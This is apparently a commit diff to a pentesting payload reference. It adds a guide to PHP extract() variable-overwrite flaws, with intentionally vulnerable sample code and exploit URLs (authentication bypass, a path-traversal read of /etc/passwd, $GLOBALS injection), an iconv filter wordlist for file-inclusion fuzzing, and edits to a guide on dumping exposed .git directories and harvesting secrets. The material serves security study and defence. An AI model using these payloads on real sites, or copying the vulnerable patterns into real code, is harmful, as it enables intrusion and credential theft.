External Variable Modification

swisskyrepo · Mar 7, 2025 · 64b3685 · 64b3685
1 parent 0e93cae
commit 64b3685
Show file tree

Hide file tree

Showing 5 changed files with 228 additions and 57 deletions.
diff --git a/External Variable Modification/README.md b/External Variable Modification/README.md
@@ -0,0 +1,98 @@
+# External Variable Modification
+
+> External Variable Modification Vulnerability occurs when a web application improperly handles user input, allowing attackers to overwrite internal variables. In PHP, functions like extract($_GET), extract($_POST), or import_request_variables() can be abused if they import user-controlled data into the global scope without proper validation. This can lead to security issues such as unauthorized changes to application logic, privilege escalation, or bypassing security controls.
+
+## Summary
+
+* [Methodology](#methodology)
+    * [Overwriting Critical Variables](#overwriting-critical-variables)
+    * [Poisoning File Inclusion](#poisoning-file-inclusion)
+    * [Global Variable Injection](#global-variable-injection)
+* [Remediations](#remediations)
+* [References](#references)
+
+## Methodology
+
+The `extract()` function in PHP imports variables from an array into the current symbol table. While it may seem convenient, it can introduce serious security risks, especially when handling user-supplied data.
+
+* It allows overwriting existing variables.
+* It can lead to **variable pollution**, impacting security mechanisms.
+* It can be used as a **gadget** to trigger other vulnerabilities like Remote Code Execution (RCE) and Local File Inclusion (LFI).
+
+By default, `extract()` uses `EXTR_OVERWRITE`, meaning it **replaces existing variables** if they share the same name as keys in the input array.
+
+### Overwriting Critical Variables
+
+If `extract()` is used in a script that relies on specific variables, an attacker can manipulate them.
+
+```php
+<?php
+    $authenticated = false;
+    extract($_GET);
+    if ($authenticated) {
+        echo "Access granted!";
+    } else {
+        echo "Access denied!";
+    }
+?>
+```
+
+**Exploitation:**
+
+In this example, the use of `extract($_GET)` allow an attacker to set the `$authenticated` variable to `true`:
+
+```ps1
+http://example.com/vuln.php?authenticated=true
+http://example.com/vuln.php?authenticated=1
+```
+
+### Poisoning File Inclusion
+
+If `extract()` is combined with file inclusion, attackers can control file paths.
+
+```php
+<?php
+    $page = "config.php";
+    extract($_GET);
+    include "$page";
+?>
+```
+
+**Exploitation:**
+
+```ps1
+http://example.com/vuln.php?page=../../etc/passwd
+```
+
+### Global Variable Injection
+
+:warning: As of PHP 8.1.0, write access to the entire `$GLOBALS` array is no longer supported.
+
+Overwriting `$GLOBALS` when an application calls `extract` function on untrusted value:
+
+```php
+extract($_GET);
+```
+
+An attacker can manipulate **global variables**:
+
+```ps1
+http://example.com/vuln.php?GLOBALS[admin]=1
+```
+
+## Remediations
+
+Use `EXTR_SKIP` to prevent overwriting:
+
+```php
+extract($_GET, EXTR_SKIP);
+```
+
+## References
+
+* [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/473.html)
+* [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/621.html)
+* [Function extract - PHP Documentation - March 21, 2001](https://www.php.net/manual/en/function.extract.php)
+* [$GLOBALS variables - PHP Documentation - April 30, 2008](https://www.php.net/manual/en/reserved.variables.globals.php)
+* [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md)
+* [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://ctftime.org/writeup/38076)
diff --git a/File Inclusion/Intruders/php-filter-iconv.txt b/File Inclusion/Intruders/php-filter-iconv.txt
@@ -0,0 +1,50 @@
+convert.iconv.437.CP930
+convert.iconv.CP1390.CSIBM932
+convert.iconv.CP273.CP1122
+convert.iconv.CP285.CP280
+convert.iconv.CSISO5427CYRILLIC.855
+convert.iconv.CSN_369103.CP770
+convert.iconv.CSUNICODE.CSUNICODE
+convert.iconv.CSUNICODE.UCS-2BE
+convert.iconv.ES.IBM037
+convert.iconv.ES.IBM930
+convert.iconv.IBM037.CP1250
+convert.iconv.IBM037.IBM256
+convert.iconv.IBM037.IBM280
+convert.iconv.IBM037.IBM860
+convert.iconv.IBM1122.IBM273
+convert.iconv.IBM1137.8859_1
+convert.iconv.IBM1141.8859_1
+convert.iconv.IBM1141.IBM4517
+convert.iconv.IBM1145.IBM850
+convert.iconv.IBM1148.EBCDIC-AT-DE-A
+convert.iconv.IBM1149.MAC-SAMI
+convert.iconv.IBM1390.IBM932
+convert.iconv.IBM1390.IBM939
+convert.iconv.IBM1399.IBM930
+convert.iconv.IBM256.IBM273
+convert.iconv.IBM273.CWI
+convert.iconv.IBM273.ES
+convert.iconv.IBM273.IBM420
+convert.iconv.IBM273.IT
+convert.iconv.IBM273.PT
+convert.iconv.IBM273.US
+convert.iconv.IBM277.ISO-8859-9E
+convert.iconv.IBM278.IBM861
+convert.iconv.IBM278.MIK
+convert.iconv.IBM284.IBM278
+convert.iconv.IBM297.IBM273
+convert.iconv.IBM297.IBM280
+convert.iconv.IBM4971.ARMSCII-8
+convert.iconv.IBM870.MAC-IS
+convert.iconv.L1.UCS-4
+convert.iconv.L1.UCS-4LE
+convert.iconv.L1.UTF16LE
+convert.iconv.L1.utf7
+convert.iconv.L1.UTF7
+convert.iconv.UCS-4LE.10646-1:1993
+convert.iconv.UTF16.UTF16
+convert.iconv..UTF7
+convert.iconv.UTF8.CP930
+convert.iconv.UTF8.IBM1140
+convert.iconv.VISCII.MSZ_7795.3
diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md
@@ -14,35 +14,37 @@
         * [GitHack](#githack)
         * [GitTools](#gittools)
     * [Harvesting secrets](#harvesting-secrets)
+        * [noseyparker](#noseyparker)
         * [trufflehog](#trufflehog)
         * [Yar](#yar)
         * [Gitrob](#gitrob)
         * [Gitleaks](#gitleaks)
-* [Refererences]
-
+* [References](#references)
 
 ## Methodology
 
 The following examples will create either a copy of the .git or a copy of the current commit.
 
 Check for the following files, if they exist you can extract the .git folder.
 
-- `.git/config`
-- `.git/HEAD`
-- `.git/logs/HEAD`
-
+* `.git/config`
+* `.git/HEAD`
+* `.git/logs/HEAD`
 
 ### Recovering file contents from .git/logs/HEAD
 
-1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
-2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
+* Check for 403 Forbidden or directory listing to find the `/.git/` directory
+* Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
+
   ```powershell
   0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
   15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <[email protected]> 1489390329 +0000        commit: Initial.
   26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <[email protected]> 1489390330 +0000        commit: Whoops! Remove flag.
   6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <[email protected]> 1489390332 +0000        commit: Prevent directory listing.
   ```
-3. Access the commit using the hash
+
+* Access the commit using the hash
+
   ```powershell
   # create an empty .git repository
   git init test
@@ -63,31 +65,34 @@ Check for the following files, if they exist you can extract the .git folder.
       committer Michael <[email protected]> 1489390329 +0000
       Initial.
   ```
-4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
-  ```powershell
-  wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
-  mkdir .git/object/32
-  mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
-
-  git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
-      040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
-      100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
-      040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
-      100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
-      040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
-  ```
-5. Read the data (flag.txt)
+
+* Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+
+    ```powershell
+    wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+    mkdir .git/object/32
+    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
+
+    git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
+        040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
+        100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
+        040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
+        100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
+        040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
+    ```
+
+* Read the data (flag.txt)
+
   ```powershell
   wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
   mkdir .git/object/cb
   mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
   git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
   ```
 
-
 ### Recovering file contents from .git/index
 
-Use the git index file parser https://pypi.python.org/pypi/gin (python3).
+Use the git index file parser <https://pypi.python.org/pypi/gin> (python3).
 
 ```powershell
 pip3 install gin
@@ -105,14 +110,14 @@ name = CRLF injection/README.md
 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 ```
 
-
 ## Tools
 
 ### Automatic recovery
 
 #### git-dumper.py
 
 * [arthaud/git-dumper](https://github.com/arthaud/git-dumper)
+
 ```powershell
 pip install -r requirements.txt
 ./git-dumper.py http://web.site/.git ~/website
@@ -175,16 +180,27 @@ GitHack.py http://web.site/.git/
 git checkout -- .
 ```
 
-
 ### Harvesting secrets
 
+#### noseyparker
+
+> [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history.
+
+```ps1
+git clone https://github.com/trufflesecurity/test_keys
+docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/
+docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always
+noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
+noseyparker scan --datastore np.noseyparker --github-user octocat
+```
+
 #### trufflehog
 
 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
 
 ```powershell
-pip install truffleHog # https://github.com/dxa4481/truffleHog
-truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
+pip install truffleHog
+truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git
 ```
 
 #### Yar
@@ -211,21 +227,23 @@ gitrob [options] target [target2] ... [targetN]
 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
 
 * Run gitleaks against a public repository
+
     ```powershell
     docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
     ```
 
 * Run gitleaks against a local repository already cloned into /tmp/
+
     ```powershell
     docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
     ```
 
 * Run gitleaks against a specific Github Pull request
+
     ```powershell
     docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
     ```
 
-
 ## References
 
-- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
+* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)